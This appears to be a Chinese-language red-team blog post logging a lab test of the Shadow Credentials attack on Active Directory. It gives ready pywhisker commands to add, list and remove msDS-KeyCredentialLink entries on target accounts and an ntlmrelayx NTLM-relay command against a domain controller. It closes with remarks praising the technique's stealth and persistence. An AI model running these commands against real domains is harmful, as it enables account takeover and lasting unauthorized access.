长亭百川云 - 文章详情

Shadow Credentials简单利用流水帐

甲方安全建设

38

2024-07-13

0x00 前置条件

上周的测试记录,可能有错漏的地方,暂时不改发出来吧。

下面所有操作,尽在测试环境完成。仅供参考

  • 谁能新增

  • 域管

  • KeyCredential Admins

  • Acl高权限用户

  • 机器账号给自己新增

  • 给哪个受害者新增(高价值目标)

  • 域用户(域管等)

  • 域机器账号(DC/EX等)

0x01 攻击域用户

这里的win7是域管(之前某次测试中提权了)

  • 新增msDS-KeyCredentialLink属性
`//add   python3 pywhisker.py -d "bsec.corp" -u "win7" -p "your_password" --target "win10" --action "add" -o test1 --dc-ip dc3.bsec.corp   `
  • 利用环节: 获取目标Win10 hash

  • 列举和删除新增的KeyCredentialLink

`//list   python3 pywhisker.py -d "bsec.corp" -u "win7" -p "your_password" --target "win10" --action "list" -o test1 --dc-ip dc3.bsec.corp   //del   python3 pywhisker.py -d "bsec.corp" -u "win7" -p "your_password" --target "win10" --action "remove" --device-id fcfce57f-eddb-e428-18c3-a844f750fc05 --dc-ip dc3.bsec.corp   `

0x02 攻击域内高价值机器账号

  • 目标

  • ex03: exchange机器账号

  • 新增msDS-KeyCredentialLink属性

  • 利用环节: 获取目标ex03 hash

  • 测试权限

0x03 其他简单测试case

  • 域控机器账号DC2$(AD CS)编辑win10的KeyCredentialLink

  • 失败

  • Ex机器账号Ex03$编辑win10的KeyCredentialLink

  • 失败

  • 域控机器账号DC2$(AD CS)编辑DC3$KeyCredentialLink

  • 失败

  • 域普通用户win8编辑win8(自己)KeyCredentialLink

  • 失败

  • 域机器用户iis$编辑iis$(自己)KeyCredentialLink

  • 成功

0x04 ntlm 中继添加msDS-KeyCredentialLink

  • efs+webdav 打DC2$ (无签名)

默认server不会有webdav,我是之前测试刚好安装&启动了的

`python3 ntlmrelayx.py  --shadow-credent --shadow-target 'dc2$' -t ldap://dc4 --remove-mic` 

拿着pfx,玩法同上

0x05 图片来源及参考

  • Relai NTLM

  • pywhisker

  • 协议库: pydsinternals

  • Shadow Credentials: Abusing Key Trust Account Mapping for Account Takeover

0x06 思考

  • 和委派之类操作测试,新增后,就获得一张长期饭票(不管目标密码怎么换)。权限维持还是很舒服的

  • 比委派舒服的就是可以打用户&机器账号,场景更广,组合拳更多,并且还可以拿到ntlmhash.

  • 拿着的证书有效期页很长, 隐秘性也还不错.

  • 做域内权限驻留,目前肯定不错的,委派太多规则了。这个比较新.

  • 不需要AD CS Web也有一些组合拳玩.

  • 一封邮件过去, 可能域就拿下了. relay

0x07 最新动态

  • 知识星球: 红蓝早读 (碎片记录)

  • 公众号: 甲方安全建设 (整理沉淀)

  • 作者: red4blue (交流讨论)

公众号增改字数和次数有限,防御检测策略,其它拓展思考,可能会留到群里讨论,留到星球沉淀.

相关推荐
关注或联系我们
添加百川云公众号,移动管理云安全产品
咨询热线:
4000-327-707
百川公众号
百川公众号
百川云客服
百川云客服

Copyright ©2024 北京长亭科技有限公司
icon
京ICP备 2024055124号-2